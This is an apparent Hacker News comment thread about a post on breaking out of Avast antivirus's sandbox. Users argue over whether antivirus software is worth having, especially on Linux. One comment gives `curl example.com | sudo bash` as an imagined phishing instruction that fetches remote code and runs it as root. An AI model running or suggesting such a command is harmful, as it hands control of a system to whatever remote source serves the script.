‹ BackHN Continuity

Thread

Entering and Breaking the Avast Antivirus Sandbox Part 2

115 points · 32 comments · safateam

  1. x-complexity · · focus · HN ↗
    Chalk another one up for "Antiviruses causing more problems than solving them".

    They 'worked' when they initially just scanned files for known malicious signatures. Now they're the equivalent of a sledgehammer to a wall with all of the extra bells & whistles strapped to them.

    Application whitelisting is the remaining way forward if you actually care about runtime security. That & locking every access point down to the bare minimum.

    1. codedokode · · focus · HN ↗
      Antivirus is not a bad thing. Imagine running a company where there are 100 employees that click every link and open every attachment. Definitely safer with an antivirus.
      1. master-lincoln · · focus · HN ↗
        I imagined it with employees on Linux and it wasn't clear to me it's definitely safer with an antivirus software. You are just stating things without explaining yourself...
        1. r_lee · · focus · HN ↗
          how? if there's hundreds of employees and one of them downloads something that's detectable, you've now prevented a disaster that otherwise wouldn't have
        2. gus_massa · · focus · HN ↗
          Imagine they got an email from the HR department that says that they must copy `curl example.com | sudo bash` to prove they are human and get their salary...
        3. fn-mote · · focus · HN ↗
          Maybe you’re imagining no local privilege escalation vulnerabilities. Those are low severity in general, but if you can get a user to run something it’s all over.

          How much do I need to go on? A foothold on a local computer allows the attacker to spread horizontally across your network.

          It’s just a matter of time before you’re fighting real-time AI-driven attacks (most sites aren’t yet). Good luck even with your antivirus. Which I agree is going to be one of the footholds that is used against you.

        4. mitxela · · focus · HN ↗
          That's only because Linux doesn't have working antivirus though. If it did, you'd want it.
          1. akazantsev · · focus · HN ↗
            Or... working viruses on Linuxes, for that matter. They always throw something about needing glibc x.x.x or higher.
            1. mitxela · · focus · HN ↗
              npm viruses were pretty successful
              1. sellmesoap · · focus · HN ↗
                Who hosts npm? Oh same same!
            2. not_a9 · · focus · HN ↗
              Technically most malware should generally be able to rely on the syscall interface, no? As generally it doesn’t need a GUI or anything
Open on Hacker News to reply ↗

Unofficial Hacker News client; not affiliated with Y Combinator.